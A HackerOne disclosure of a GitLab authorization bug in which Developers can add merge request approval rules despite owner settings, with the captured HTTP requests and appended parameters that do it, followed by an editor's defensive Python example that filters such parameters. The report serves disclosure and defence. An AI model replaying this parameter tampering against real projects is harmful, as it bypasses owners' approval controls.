Override approvers and approvals required per merge request despite no permissions
HackerOne report #544756 by ashish_r_padelkar
on 2019-04-21, assigned to estrike
Summary
Hello,
The Owner/Maintainer of the project may prevent overriding of approvers and approvals required per merge request by setting the below settings in the project settings.
However, Developer users can still create new approval rules per merge request!
Steps to reproduce
- As a project owner, set a setting like below for merge request approval rules
- As a Developer user in a project, go to any merge request and EDIT it. Once it reloads, you see that you cannot EDIT or create new approval rules.
- Without doing anything else, just click on save and capture the below request
POST /PrivateGroupofGuest/project2/merge_requests/2 HTTP/1.1
Host: gitlab.com
Connection: close
Content-Length: 542
Cache-Control: max-age=0
Origin: https://gitlab.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: https://gitlab.com/PrivateGroupofGuest/project2/merge_requests/2/edit
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: _gitlab_session=1; event_filter=all; sidebar_collapsed=false
utf8=%E2%9C%93&_method=patch&authenticity_token=1&merge_request%5Btitle%5D=ExampleMergeRequest&merge_request%5Bdescription%5D=Closes+%233&merge_request%5Bassignee_id%5D=&merge_request%5Bmilestone_id%5D=847953&merge_request%5Blabel_ids%5D%5B%5D=&merge_request%5Blabel_ids%5D%5B%5D=10328587&merge_request%5Btarget_branch%5D=master&merge_request%5Bforce_remove_source_branch%5D=0&merge_request%5Bsquash%5D=0&merge_request%5Block_version%5D=
- Append the below parameters to the above request
&merge_request[approval_rules_attributes][][name]=ThisIsCreatedDespiteSettingsByOnwer&merge_request[approval_rules_attributes][][user_ids][]=3148078&merge_request[approval_rules_attributes][][approvals_required]=1
Whereas 3148078 is my user ID; you may try adding yours if mine doesn't work for you.
- So the final request would look like this:
POST /PrivateGroupofGuest/project2/merge_requests/2 HTTP/1.1
Host: gitlab.com
Connection: close
Content-Length: 542
Cache-Control: max-age=0
Origin: https://gitlab.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: https://gitlab.com/PrivateGroupofGuest/project2/merge_requests/2/edit
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: _gitlab_session=1; event_filter=all; sidebar_collapsed=false
utf8=%E2%9C%93&_method=patch&authenticity_token=1&merge_request%5Btitle%5D=WIP%3A+Resolve+%22yyyy%22&merge_request%5Bdescription%5D=Closes+%233&merge_request%5Bassignee_id%5D=&merge_request%5Bmilestone_id%5D=847953&merge_request%5Blabel_ids%5D%5B%5D=&merge_request%5Blabel_ids%5D%5B%5D=10328587&merge_request%5Btarget_branch%5D=master&merge_request%5Bforce_remove_source_branch%5D=0&merge_request%5Bsquash%5D=0&merge_request%5Block_version%5D=&merge_request[approval_rules_attributes][][name]=ThisIsCreatedDespiteSettingsByOnwer&merge_request[approval_rules_attributes][][user_ids][]=3148078&merge_request[approval_rules_attributes][][approvals_required]=1
- Send this request. Once done, click on EDIT merge request again and scroll down to approval rules.
- Now you should see the approval rule created despite it not being allowed by the owners!
What is the current bug behavior?
A Developer can override the merge request approval rules despite the settings by the owner!
What is the expected correct behavior?
A Developer should not be allowed to create an approval rule when the owner does not allow it.
Output of checks
This bug happens on GitLab.com and probably on omnibus installations too!
Regards,
Ashish
Impact
Developers can override approval rule settings
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
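The bug above is a mass-assignment / missing-authorization problem: the merge request update action accepted nested `approval_rules_attributes` parameters from anyone allowed to edit the merge request, without consulting the project setting that forbids per-MR overrides. The following is an added example by the editor, not code from the report and not GitLab's implementation. It models the check the endpoint lacked, using the reporter's final request body (abridged) as input; the setting name `disable_overriding_approvers_per_merge_request`, the role ladder and the rule that Developer level or above may add rules when the setting is off are assumptions made for the illustration.

```python
# Added example (editor's illustration; not code from the HackerOne report
# and not GitLab's implementation). It models the server-side check the
# reported endpoint lacked: nested approval-rule parameters submitted with a
# merge request update must be filtered by project setting and role before
# they are applied. Setting name, role names and role levels are assumptions.
from urllib.parse import parse_qsl

# The final request body from the report (abridged: unrelated fields such as
# assignee_id and label_ids omitted), with the three approval-rule parameters
# the reporter appended at the end.
CAPTURED_BODY = (
    "utf8=%E2%9C%93&_method=patch&authenticity_token=1"
    "&merge_request%5Btitle%5D=WIP%3A+Resolve+%22yyyy%22"
    "&merge_request%5Bdescription%5D=Closes+%233"
    "&merge_request%5Btarget_branch%5D=master"
    "&merge_request%5Bsquash%5D=0"
    "&merge_request[approval_rules_attributes][][name]=ThisIsCreatedDespiteSettingsByOnwer"
    "&merge_request[approval_rules_attributes][][user_ids][]=3148078"
    "&merge_request[approval_rules_attributes][][approvals_required]=1"
)

# Hypothetical role ladder and project setting (names assumed for the example).
ROLE_LEVEL = {"guest": 10, "reporter": 20, "developer": 30, "maintainer": 40, "owner": 50}
OVERRIDE_SETTING = "disable_overriding_approvers_per_merge_request"

# Every key under this prefix carries a per-MR approval rule.
APPROVAL_PREFIX = "merge_request[approval_rules_attributes]"


def can_override_approvers(role, project_settings):
    """Permission the report's endpoint never consulted: when the project
    disables per-MR overrides nobody may submit approval rules through the
    MR form; otherwise Developer level or above may (assumed policy)."""
    if project_settings.get(OVERRIDE_SETTING, False):
        return False
    return ROLE_LEVEL[role] >= ROLE_LEVEL["developer"]


def filter_update_params(body, role, project_settings):
    """Decode the form body and split it into (accepted, rejected) pairs.

    Matching happens after percent-decoding, so `merge_request%5B...%5D`
    and `merge_request[...]` are treated alike; an allowlist that compared
    raw strings could be bypassed by switching the encoding."""
    pairs = parse_qsl(body, keep_blank_values=True)
    override_ok = can_override_approvers(role, project_settings)
    accepted, rejected = [], []
    for key, value in pairs:
        if key.startswith(APPROVAL_PREFIX) and not override_ok:
            rejected.append((key, value))
        else:
            accepted.append((key, value))
    return accepted, rejected


def extract_approval_rules(pairs):
    """Rebuild the list of rule hashes that Rails-style
    `...[approval_rules_attributes][][field]` keys describe (simplified:
    a repeated scalar field starts a new rule; `[]`-suffixed fields collect)."""
    rules, current = [], None
    for key, value in pairs:
        if not key.startswith(APPROVAL_PREFIX + "[]["):
            continue
        rest = key[len(APPROVAL_PREFIX) + 3:]          # "name]" or "user_ids][]"
        field, is_array = rest.split("]", 1)[0], rest.endswith("[]")
        if current is None or (field in current and not is_array):
            current = {}
            rules.append(current)
        if is_array:
            current.setdefault(field, []).append(value)
        else:
            current[field] = value
    return rules


def handle_merge_request_update(body, role, project_settings):
    """What a hardened update action would apply: ordinary MR fields,
    approval rules only if permitted, and the parameters it dropped."""
    accepted, rejected = filter_update_params(body, role, project_settings)
    fields = {k: v for k, v in accepted if not k.startswith(APPROVAL_PREFIX)}
    return {
        "fields": fields,
        "approval_rules": extract_approval_rules(accepted),
        "rejected": rejected,
    }


if __name__ == "__main__":
    locked = {OVERRIDE_SETTING: True}
    for role in ("developer", "maintainer"):
        result = handle_merge_request_update(CAPTURED_BODY, role, locked)
        print(role, "rules applied:", result["approval_rules"],
              "dropped:", [k for k, _ in result["rejected"]])
    print("developer, override allowed:",
          handle_merge_request_update(CAPTURED_BODY, "developer", {})["approval_rules"])
```

Two practical points follow from the report's captures. The appended parameters use literal brackets while the browser-generated ones use `%5B`/`%5D`; a form decoder normalizes both to the same key, so any filter has to run on the decoded keys, as above, rather than on the raw body. And when replaying the captured request by hand, the `Content-Length` header must be recomputed for the longer body (both captures in the report still show 542), otherwise the server will truncate the appended parameters.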